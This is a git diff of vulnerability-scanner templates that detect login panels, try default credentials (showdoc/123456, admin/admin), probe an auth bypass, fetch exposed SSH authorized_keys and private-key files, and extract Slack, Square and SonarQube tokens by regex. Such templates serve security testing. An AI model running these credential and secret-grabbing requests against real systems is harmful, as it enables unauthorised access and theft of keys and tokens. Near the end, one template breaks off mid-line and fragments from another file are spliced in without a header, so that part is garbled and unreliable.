diff --git a/poc/auth/shoppable-token.yaml b/poc/auth/shoppable-token.yaml
new file mode 100644
index 0000000000..71cd3fb638
--- /dev/null
+++ b/poc/auth/shoppable-token.yaml
@@ -0,0 +1,16 @@
+id: shoppable-token
+info:
+ name: Shoppable Service Auth Token
+ author: philippedelteil
+ severity: unknown
+ reference: https://ask.shoppable.com/knowledge/quick-start-api-guide
+ tags: exposure,shoppable,token,auth,service
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ matchers:
+ - type: word
+ part: body
+ words:
+ - data-shoppable-auth-token
diff --git a/poc/auth/showdoc-default-login-10221.yaml b/poc/auth/showdoc-default-login-10221.yaml
index 4bf519de51..70a3336a98 100644
--- a/poc/auth/showdoc-default-login-10221.yaml
+++ b/poc/auth/showdoc-default-login-10221.yaml
@@ -1,4 +1,5 @@
id: showdoc-default-login
+
info:
name: Showdoc Default Login
author: pikpikcu
@@ -6,13 +7,15 @@ info:
description: Showdoc default credentials were discovered.
reference:
- https://blog.star7th.com/2016/05/2007.html
- tags: showdoc,default-login
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
- cve-id:
cwe-id: CWE-522
-requests:
+ metadata:
+ max-request: 1
+ tags: showdoc,default-login
+
+http:
- raw:
- |
POST /server/index.php?s=/api/user/login HTTP/1.1
@@ -20,12 +23,14 @@ requests:
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
username={{username}}&password={{password}}&v_code=
+
payloads:
username:
- showdoc
password:
- 123456
attack: pitchfork
+
matchers-condition: and
matchers:
- type: word
@@ -33,8 +38,9 @@ requests:
- '"username":"showdoc"'
- '"user_token":'
condition: and
+
- type: status
status:
- 200
-# Enhanced by mp on 2022/03/11
+# digest: 4a0a00473045022035dad9ddfbf0e6fb91a80fca9878b313092374a601129f7792f172131a26c99d022100febc0eab2e695a86e0b0af34718b652daa0913d81e3516918c8a249e1bebffcc:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/sitefinity-login-10298.yaml b/poc/auth/sitefinity-login-10297.yaml
similarity index 100%
rename from poc/auth/sitefinity-login-10298.yaml
rename to poc/auth/sitefinity-login-10297.yaml
diff --git a/poc/auth/sitefinity-login.yaml b/poc/auth/sitefinity-login.yaml
index 0d146256b9..441e824eda 100644
--- a/poc/auth/sitefinity-login.yaml
+++ b/poc/auth/sitefinity-login.yaml
@@ -1,4 +1,5 @@
id: sitefinity-login
+
info:
name: Sitefinity Login
author: dhiyaneshDK
@@ -6,18 +7,23 @@ info:
description: This template identifies the Sitefinity login page.
reference:
- https://www.exploit-db.com/ghdb/6722
- tags: panel,sitefinity
-requests:
+ metadata:
+ max-request: 1
+ tags: sitefinity,edb,panel
+
+http:
- method: GET
path:
- '{{BaseURL}}/Sitefinity/Authenticate/SWT'
+
matchers-condition: and
matchers:
- type: word
words:
- 'Telerik.Sitefinity.Web.UI.UserPreferences'
+
- type: status
status:
- 200
-# Enhanced by cs on 2022/02/28
+# digest: 4b0a00483046022100abaac7dde301e7bfbf2c555fdc011dac48f4f07f3f1f9b47bf5353203bd09ad9022100bb9a0ca31438b251f1241420c8c01590ae7fd0dd1fd66a4582aaf834dff972d2:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/siteomat-login-10300.yaml b/poc/auth/siteomat-login-10300.yaml
deleted file mode 100644
index e24172c9a5..0000000000
--- a/poc/auth/siteomat-login-10300.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: siteomat-loader
-info:
- name: Orpak SiteOmat login portals
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/6624
- tags: panel
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/login.htm'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'SiteOmat Login'
- - type: status
- status:
- - 200
diff --git a/poc/auth/siteomat-login-10301.yaml b/poc/auth/siteomat-login-10301.yaml
new file mode 100644
index 0000000000..20854f2b8d
--- /dev/null
+++ b/poc/auth/siteomat-login-10301.yaml
@@ -0,0 +1,19 @@
+id: siteomat-loader
+info:
+ name: Orpak SiteOmat login portals
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6624
+ tags: panel,siteomat,login
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login.htm'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'SiteOmat Login'
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/siteomat-login-10303.yaml b/poc/auth/siteomat-login-10303.yaml
index 20854f2b8d..de5e63a8ba 100644
--- a/poc/auth/siteomat-login-10303.yaml
+++ b/poc/auth/siteomat-login-10303.yaml
@@ -3,7 +3,8 @@ info:
name: Orpak SiteOmat login portals
author: dhiyaneshDK
severity: info
- reference: https://www.exploit-db.com/ghdb/6624
+ reference:
+ - https://www.exploit-db.com/ghdb/6624
tags: panel,siteomat,login
requests:
- method: GET
diff --git a/poc/auth/slack-bot-token-10310.yaml b/poc/auth/slack-bot-token-10310.yaml
index e520d806c8..8e76c2814d 100644
--- a/poc/auth/slack-bot-token-10310.yaml
+++ b/poc/auth/slack-bot-token-10310.yaml
@@ -1,18 +1,15 @@
id: slack-bot-token
-
info:
name: Slack access token
author: nadino
severity: info
tags: exposure,token,slack
-
requests:
- method: GET
path:
- "{{BaseURL}}"
-
extractors:
- type: regex
part: body
regex:
- - "xoxb-[0-9A-Za-z\\-]{51}"
\ No newline at end of file
+ - "xoxb-[0-9A-Za-z\\-]{51}"
diff --git a/poc/auth/slack-bot-token-10312.yaml b/poc/auth/slack-bot-token-10312.yaml
new file mode 100644
index 0000000000..e520d806c8
--- /dev/null
+++ b/poc/auth/slack-bot-token-10312.yaml
@@ -0,0 +1,18 @@
+id: slack-bot-token
+
+info:
+ name: Slack access token
+ author: nadino
+ severity: info
+ tags: exposure,token,slack
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "xoxb-[0-9A-Za-z\\-]{51}"
\ No newline at end of file
diff --git a/poc/auth/slocum-login-10317.yaml b/poc/auth/slocum-login-10317.yaml
index b5ffdacd1e..118932715d 100644
--- a/poc/auth/slocum-login-10317.yaml
+++ b/poc/auth/slocum-login-10317.yaml
@@ -1,18 +1,22 @@
id: slocum-login
+
info:
name: Slocum Fleet Mission Control Login
author: pussycat0x
severity: info
tags: panel,tech,slocum
+
requests:
- method: GET
path:
- "{{BaseURL}}/sfmc/login"
+
matchers-condition: and
matchers:
- type: word
words:
- "Slocum Fleet Mission Control - Login"
+
- type: status
status:
- 200
diff --git a/poc/auth/slocum-login.yaml b/poc/auth/slocum-login.yaml
index 108ce5cc24..b5ffdacd1e 100644
--- a/poc/auth/slocum-login.yaml
+++ b/poc/auth/slocum-login.yaml
@@ -1,31 +1,18 @@
id: slocum-login
-
info:
- name: Slocum Fleet Mission Control Login Panel - Detect
+ name: Slocum Fleet Mission Control Login
author: pussycat0x
severity: info
- description: Slocum Fleet Mission Control login panel was detected.
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
- metadata:
- max-request: 1
tags: panel,tech,slocum
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/sfmc/login"
-
matchers-condition: and
matchers:
- type: word
words:
- "Slocum Fleet Mission Control - Login"
-
- type: status
status:
- 200
-
-# digest: 4a0a00473045022100d4e6d5f058359a5d8b637a79a5ac3fba6066e07f6971c60ed482705b22cdb0fb02203cfc99e10ca906964c7533d1d0aaec6982103e16e14207147c2ab5a159d07010:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/smartsense-default-login-10330.yaml b/poc/auth/smartsense-default-login-10330.yaml
index b4af83b266..accfe10352 100644
--- a/poc/auth/smartsense-default-login-10330.yaml
+++ b/poc/auth/smartsense-default-login-10330.yaml
@@ -1,4 +1,5 @@
id: smartsense-default-login
+
info:
name: HortonWorks SmartSense Default Login
author: Techryptic (@Tech)
@@ -10,30 +11,37 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
+ metadata:
+ max-request: 1
tags: hortonworks,smartsense,default-login
-requests:
+
+http:
- raw:
- |
GET /apt/v1/context HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(username + ':' + password)}}
+
payloads:
username:
- admin
password:
- admin
attack: pitchfork
+
matchers-condition: and
matchers:
- type: word
words:
- "Set-Cookie: SUPPORTSESSIONID"
part: header
+
- type: word
words:
- "smartsenseId"
+
- type: status
status:
- 200
-# Enhanced by mp on 2022/03/10
+# digest: 4a0a004730450221008b7310d0ce26ecd9fffe8991ba01f96ae300acf8002c75a28347f40c94ed5a6802202e17996a4e4e1483ed8f58408f3a8b448c315aa8c380d084c0f6c88fbbb22b64:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/smartsense-default-login-10331.yaml b/poc/auth/smartsense-default-login-10331.yaml
index 88bc61e7b6..e6c7dc5e8c 100644
--- a/poc/auth/smartsense-default-login-10331.yaml
+++ b/poc/auth/smartsense-default-login-10331.yaml
@@ -3,14 +3,9 @@ info:
name: HortonWorks SmartSense Default Login
author: Techryptic (@Tech)
severity: high
- description: HortonWorks SmartSense default admin login information was detected.
+ description: Default Login of admin:admin on HortonWorks SmartSense application.
reference: https://docs.cloudera.com/HDPDocuments/SS1/SmartSense-1.2.2/bk_smartsense_admin/content/manual_server_login.html
tags: hortonworks,smartsense,default-login
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
requests:
- raw:
- |
@@ -35,5 +30,3 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/03/10
diff --git a/poc/auth/solar-log-authbypass-10352.yaml b/poc/auth/solar-log-authbypass-10352.yaml
deleted file mode 100644
index 6b4d906250..0000000000
--- a/poc/auth/solar-log-authbypass-10352.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: solar-log-authbypass
-
-info:
- name: Solar-Log 500 2.8.2 - Incorrect Access Control
- author: geeknik
- severity: high
- description: Solar-Log 500 2.8.2 is susceptible to incorrect access control because the web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server.
- reference:
- - https://www.exploit-db.com/exploits/49986
- classification:
- cwe-id: CWE-284
- metadata:
- max-request: 1
- tags: solarlog,auth-bypass,edb
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/lan.html"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: header
- words:
- - "IPC@CHIP"
-
- - type: word
- part: body
- words:
- - " Solare Datensysteme GmbH"
- - "mailto:info@solar-log.com"
- condition: and
-
-# digest: 4a0a00473045022100befc1d4bf898609aed2567951ef9d96923407a7ac74979b6969d38b7e0d2295702200e9232cb6c80aebd34b60aa9dc6af19437484593d9a84e0af8b06fbd584053d4:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/solar-log-authbypass.yaml b/poc/auth/solar-log-authbypass.yaml
new file mode 100644
index 0000000000..9e66b4dc51
--- /dev/null
+++ b/poc/auth/solar-log-authbypass.yaml
@@ -0,0 +1,27 @@
+id: solar-log-authbypass
+info:
+ name: Solar-Log 500 2.8.2 - Incorrect Access Control
+ author: geeknik
+ severity: high
+ description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server
+ reference: https://www.exploit-db.com/exploits/49986
+ tags: solarlog,auth-bypass
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/lan.html"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: header
+ words:
+ - "IPC@CHIP"
+ - type: word
+ part: body
+ words:
+ - " Solare Datensysteme GmbH"
+ - "mailto:info@solar-log.com"
+ condition: and
diff --git a/poc/auth/solarwinds-default-login-10355.yaml b/poc/auth/solarwinds-default-login-10355.yaml
deleted file mode 100644
index ea489ae260..0000000000
--- a/poc/auth/solarwinds-default-login-10355.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: solarwinds-default-admin
-info:
- name: SolarWinds Orion Default Login
- author: dwisiswant0
- severity: high
- description: SolarWinds Orion default admin credentials were discovered.
- reference:
- - https://github.com/solarwinds/OrionSDK/wiki/REST
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- tags: solarwinds,default-login
-# Optional:
-# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1
-# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
-requests:
- - raw:
- - |
- GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
- Host: {{Hostname}}
- Authorization: Basic {{base64(username)}}
- - |
- GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1
- Host: {{Hostname}}
- Authorization: Basic {{base64(username)}}
- payloads:
- username:
- - admin
- attack: pitchfork
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Content-Type: application/json"
- part: header
- - type: regex
- regex:
- - "(totalRow|result|swi)s(:\\/\\/)?"
- - "(Orion\\.|Poller(ID)?)s?"
- condition: and
- part: body
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/11
diff --git a/poc/auth/solarwinds-default-login-10356.yaml b/poc/auth/solarwinds-default-login-10356.yaml
index 94fa5c0a3c..ea489ae260 100644
--- a/poc/auth/solarwinds-default-login-10356.yaml
+++ b/poc/auth/solarwinds-default-login-10356.yaml
@@ -3,11 +3,17 @@ info:
name: SolarWinds Orion Default Login
author: dwisiswant0
severity: high
+ description: SolarWinds Orion default admin credentials were discovered.
+ reference:
+ - https://github.com/solarwinds/OrionSDK/wiki/REST
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
tags: solarwinds,default-login
- reference: https://github.com/solarwinds/OrionSDK/wiki/REST
- # Optional:
- # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1
- # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
+# Optional:
+# POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1
+# {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337}
requests:
- raw:
- |
@@ -37,3 +43,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/11
diff --git a/poc/auth/somfy-login-10371.yaml b/poc/auth/somfy-login-10371.yaml
new file mode 100644
index 0000000000..2a3d4c40d1
--- /dev/null
+++ b/poc/auth/somfy-login-10371.yaml
@@ -0,0 +1,18 @@
+id: somfy-login
+info:
+ name: Somfy Login Page
+ author: DhiyaneshDK
+ severity: info
+ tags: panel
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/m_login.htm'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - Home motion by Somfy
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/somfy-login-10373.yaml b/poc/auth/somfy-login-10373.yaml
deleted file mode 100644
index 4a22eded46..0000000000
--- a/poc/auth/somfy-login-10373.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: somfy-login
-info:
- name: Somfy Login Page
- author: DhiyaneshDK
- severity: info
- tags: panel,login
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/m_login.htm'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - Home motion by Somfy
- - type: status
- status:
- - 200
diff --git a/poc/auth/sonarqube-token-10380.yaml b/poc/auth/sonarqube-token-10380.yaml
deleted file mode 100644
index ceac80589a..0000000000
--- a/poc/auth/sonarqube-token-10380.yaml
+++ /dev/null
@@ -1,15 +0,0 @@
-id: sonarqube-token
-info:
- name: SonarQube Token Disclosure
- author: Ice3man
- severity: info
- tags: exposure,token
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- extractors:
- - type: regex
- part: body
- regex:
- - "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"
diff --git a/poc/auth/sonarqube-token-10382.yaml b/poc/auth/sonarqube-token-10382.yaml
index 994d036f12..7fe08cc8f9 100644
--- a/poc/auth/sonarqube-token-10382.yaml
+++ b/poc/auth/sonarqube-token-10382.yaml
@@ -1,22 +1,15 @@
id: sonarqube-token
-
info:
name: SonarQube Token Disclosure
author: Ice3man
severity: info
- metadata:
- max-request: 1
tags: exposure,token,sonarqube
-
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}"
-
extractors:
- type: regex
part: body
regex:
- "sonar.{0,50}(?:\"|'|`)?[0-9a-f]{40}(?:\"|'|`)?"
-
-# digest: 4a0a0047304502204b7b6bb1ff958d322155673133a99b081ed1c61bd8afb5e1d0f249849b9badc6022100efbd2cb1fd9179a7c9a30daac8033d293490f30b28af36dadb2107ddd9d6e604:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/spark-webui-unauth-10401.yaml b/poc/auth/spark-webui-unauth-10401.yaml
new file mode 100644
index 0000000000..6ca1120cb0
--- /dev/null
+++ b/poc/auth/spark-webui-unauth-10401.yaml
@@ -0,0 +1,26 @@
+id: spark-webui-unauth
+
+info:
+ name: Unauthenticated Spark WebUI
+ author: princechaddha
+ severity: medium
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/spark/unacc
+ tags: spark,unauth
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "Spark Master at spark://"
+ - "URL:"
+ part: body
+ condition: and
diff --git a/poc/auth/spark-webui-unauth.yaml b/poc/auth/spark-webui-unauth.yaml
index 31a45c9631..a917ae6951 100644
--- a/poc/auth/spark-webui-unauth.yaml
+++ b/poc/auth/spark-webui-unauth.yaml
@@ -1,31 +1,22 @@
id: spark-webui-unauth
-
info:
name: Unauthenticated Spark WebUI
author: princechaddha
severity: medium
- reference:
- - https://github.com/vulhub/vulhub/tree/master/spark/unacc
- metadata:
- max-request: 1
- tags: unauth,vulhub,spark
-
-http:
+ reference: https://github.com/vulhub/vulhub/tree/master/spark/unacc
+ tags: spark,unauth
+requests:
- method: GET
path:
- "{{BaseURL}}"
-
matchers-condition: and
matchers:
- type: status
status:
- 200
-
- type: word
words:
- "Spark Master at spark://"
- "URL:"
part: body
condition: and
-
-# digest: 4a0a004730450220270869b1b7fd1729ea28140dbf8a434ca5b2b341dd040852601e1b37cd1e8499022100942b17a3cf90e2d877e8ffed244ff81baa455305d50bfbf4e5c9f90ad08771e7:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/sphider-login-10407.yaml b/poc/auth/sphider-login-10407.yaml
deleted file mode 100644
index f9ac4a5606..0000000000
--- a/poc/auth/sphider-login-10407.yaml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: sphider-login
-info:
- name: Sphider Admin Login
- author: dhiyaneshDK
- severity: info
- reference: https://www.exploit-db.com/ghdb/6641
- tags: panel
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/admin/spider.php'
- - '{{BaseURL}}/sphider/admin/admin.php'
- - '{{BaseURL}}/search/admin/admin.php'
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Sphider Admin Login'
- - type: status
- status:
- - 200
diff --git a/poc/auth/sphider-login-10408.yaml b/poc/auth/sphider-login-10408.yaml
index 59e7e8b72e..becae53fbd 100644
--- a/poc/auth/sphider-login-10408.yaml
+++ b/poc/auth/sphider-login-10408.yaml
@@ -3,7 +3,8 @@ info:
name: Sphider Admin Login
author: dhiyaneshDK
severity: info
- reference: https://www.exploit-db.com/ghdb/6641
+ reference:
+ - https://www.exploit-db.com/ghdb/6641
tags: panel
requests:
- method: GET
@@ -11,6 +12,7 @@ requests:
- '{{BaseURL}}/admin/spider.php'
- '{{BaseURL}}/sphider/admin/admin.php'
- '{{BaseURL}}/search/admin/admin.php'
+ stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
diff --git a/poc/auth/sphider-login-10409.yaml b/poc/auth/sphider-login-10409.yaml
new file mode 100644
index 0000000000..59e7e8b72e
--- /dev/null
+++ b/poc/auth/sphider-login-10409.yaml
@@ -0,0 +1,21 @@
+id: sphider-login
+info:
+ name: Sphider Admin Login
+ author: dhiyaneshDK
+ severity: info
+ reference: https://www.exploit-db.com/ghdb/6641
+ tags: panel
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/admin/spider.php'
+ - '{{BaseURL}}/sphider/admin/admin.php'
+ - '{{BaseURL}}/search/admin/admin.php'
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Sphider Admin Login'
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/sphider-login.yaml b/poc/auth/sphider-login.yaml
index 4745def5b6..f9ac4a5606 100644
--- a/poc/auth/sphider-login.yaml
+++ b/poc/auth/sphider-login.yaml
@@ -1,37 +1,22 @@
id: sphider-login
-
info:
- name: Sphider Admin Login Panel - Detect
+ name: Sphider Admin Login
author: dhiyaneshDK
severity: info
- description: Sphider admin login panel was detected.
- reference:
- - https://www.exploit-db.com/ghdb/6641
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
- metadata:
- max-request: 3
- tags: edb,panel
-
-http:
+ reference: https://www.exploit-db.com/ghdb/6641
+ tags: panel
+requests:
- method: GET
path:
- '{{BaseURL}}/admin/spider.php'
- '{{BaseURL}}/sphider/admin/admin.php'
- '{{BaseURL}}/search/admin/admin.php'
-
stop-at-first-match: true
-
matchers-condition: and
matchers:
- type: word
words:
- 'Sphider Admin Login'
-
- type: status
status:
- 200
-
-# digest: 4a0a004730450220189d990c7ed8618187a0925397f404775be07d3ca9d4d2be91643fdf0321a6d6022100c42cb786ca05f7be0ce6361bdb70299b93507de5f713637a2cae52fc639779ca:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/splunk-enterprise-login-panel.yaml b/poc/auth/splunk-enterprise-login-panel.yaml
index 49a90394ee..af5162d861 100644
--- a/poc/auth/splunk-enterprise-login-panel.yaml
+++ b/poc/auth/splunk-enterprise-login-panel.yaml
@@ -1,31 +1,22 @@
id: splunk-enterprise-panel
+
info:
- name: Splunk Enterprise Panel Detect
+ name: Splunk Enterprise Panel
author: praetorian-thendrickson
severity: info
- reference:
- - https://www.splunk.com/en_us/software/splunk-enterprise.html
- metadata:
- shodan-query: http.title:"Login - Splunk"
+ reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22
tags: panel,splunk
+
requests:
- method: GET
path:
- '{{BaseURL}}/en-US/account/login'
redirects: true
+
matchers-condition: and
matchers:
- type: word
words:
- 'Splunk Inc.'
- - type: status
- status:
- - 200
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - '"version": "(.*)"'
- - 'versionNumber": "([0-9.]+)"'
- - '"VERSION_LABEL": "([0-9.]+)"'
+ - 'splunkd'
+ - 'Splunk Enterprise'
diff --git a/poc/auth/splunk-enterprise-login-panel.yml b/poc/auth/splunk-enterprise-login-panel.yml
deleted file mode 100644
index af5162d861..0000000000
--- a/poc/auth/splunk-enterprise-login-panel.yml
+++ /dev/null
@@ -1,22 +0,0 @@
-id: splunk-enterprise-panel
-
-info:
- name: Splunk Enterprise Panel
- author: praetorian-thendrickson
- severity: info
- reference: https://www.shodan.io/search?query=title%3A%22Login+Splunk%22
- tags: panel,splunk
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/en-US/account/login'
- redirects: true
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Splunk Inc.'
- - 'splunkd'
- - 'Splunk Enterprise'
diff --git a/poc/auth/splunk-login-10416.yaml b/poc/auth/splunk-login-10416.yaml
new file mode 100644
index 0000000000..ccfbcaee47
--- /dev/null
+++ b/poc/auth/splunk-login-10416.yaml
@@ -0,0 +1,24 @@
+id: splunk-login
+
+info:
+ name: Splunk SOAR
+ author: dhiyaneshDK
+ severity: info
+ metadata:
+ shodan-query: http.title:"Splunk SOAR"
+ tags: panel,splunk
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/login?next=/'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - 'Splunk SOAR'
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/square-access-token(1).yaml b/poc/auth/square-access-token(1).yaml
deleted file mode 100644
index 5601c992e7..0000000000
--- a/poc/auth/square-access-token(1).yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: square-access-token
-
-info:
- name: Square Access Token
- author: gaurang,daffainfo
- severity: high
- tags: token,file,square
-
-file:
- - extensions:
- - all
-
- extractors:
- - type: regex
- regex:
- - "EAAAE[a-zA-Z0-9_-]{59}"
- - "sq0atp-[0-9A-Za-z\\-_]{22}"
diff --git a/poc/auth/square-access-token-11867.yaml b/poc/auth/square-access-token-11867.yaml
new file mode 100644
index 0000000000..e0a5d2d1d0
--- /dev/null
+++ b/poc/auth/square-access-token-11867.yaml
@@ -0,0 +1,14 @@
+id: square-access-token
+info:
+ name: Square Access Token
+ author: gaurang,daffainfo
+ severity: high
+ tags: token,file,square
+file:
+ - extensions:
+ - all
+ extractors:
+ - type: regex
+ regex:
+ - "EAAAE[a-zA-Z0-9_-]{59}"
+ - "sq0atp-[0-9A-Za-z\\-_]{22}"
diff --git a/poc/auth/square-access-token.yaml b/poc/auth/square-access-token.yaml
index e0a5d2d1d0..5601c992e7 100644
--- a/poc/auth/square-access-token.yaml
+++ b/poc/auth/square-access-token.yaml
@@ -1,12 +1,15 @@
id: square-access-token
+
info:
name: Square Access Token
author: gaurang,daffainfo
severity: high
tags: token,file,square
+
file:
- extensions:
- all
+
extractors:
- type: regex
regex:
diff --git a/poc/auth/ssh-authorized-keys-10523.yaml b/poc/auth/ssh-authorized-keys-10523.yaml
index 8cadf9c3e6..3ae41746b1 100644
--- a/poc/auth/ssh-authorized-keys-10523.yaml
+++ b/poc/auth/ssh-authorized-keys-10523.yaml
@@ -1,15 +1,26 @@
id: ssh-authorized-keys
+
info:
- name: SSH Authorized Keys
+ name: SSH Authorized Keys File - Detect
author: geeknik
- reference: https://www.ssh.com/academy/ssh/authorized-key
- severity: low
+ severity: medium
+ description: SSH authorized keys file was detected.
+ reference:
+ - https://www.ssh.com/academy/ssh/authorized-key
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cwe-id: CWE-200
+ metadata:
+ max-request: 2
tags: config,exposure,ssh
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}/.ssh/authorized_keys"
- "{{BaseURL}}/_/.ssh/authorized_keys"
+
matchers-condition: and
matchers:
- type: word
@@ -19,6 +30,9 @@ requests:
- "ssh-rsa"
- "ecdsa-sha2-nistp256"
condition: or
+
- type: status
status:
- 200
+
+# digest: 4b0a00483046022100ef061bf288841527c39730c3a04580cbcbe3c87e6037aaea3a4d70395670f44902210081cd1eea8fb47d9d7f0c76354181e3682b607af69b9cda401e1081704366c31c:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/stem-audio-table-private-keys-10535.yaml b/poc/auth/stem-audio-table-private-keys-10535.yaml
new file mode 100644
index 0000000000..ffef41a49a
--- /dev/null
+++ b/poc/auth/stem-audio-table-private-keys-10535.yaml
@@ -0,0 +1,22 @@
+id: stem-audio-table-private-keys
+info:
+ name: Detect Private Key on STEM Audio Table
+ author: gy741
+ severity: high
+ reference: https://blog.grimm-co.com/2021/06/the-walls-have-ears.html
+ tags: stem,config,exposure,iot
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/cgi-bin/privatekey.pem"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "BEGIN RSA PRIVATE KEY"
+ - type: status
+ status:
+ - 200
+ - type: dsl
+ dsl:
+ - '!contains(tolower(body), "'
+
matchers-condition: and
matchers:
- type: word
@@ -42,10 +48,12 @@ requests:
- 'Redirecting...'
- 'Redirecting...
'
+
- type: word
part: header
words:
- 'session'
+
- type: status
status:
- 302
diff --git a/poc/auth/symantec-dlp-login-10596.yaml b/poc/auth/symantec-dlp-login-10596.yaml
deleted file mode 100644
index 688e47b4ab..0000000000
--- a/poc/auth/symantec-dlp-login-10596.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: symantec-dlp-login
-info:
- name: Symantec Data Loss Prevention
- author: princechaddha
- severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Symantec+Data+Loss+Prevention%22
- tags: symantec,panel,login
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/ProtectManager/Logon'
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Symantec Data Loss Prevention"
- part: body
- - type: status
- status:
- - 200
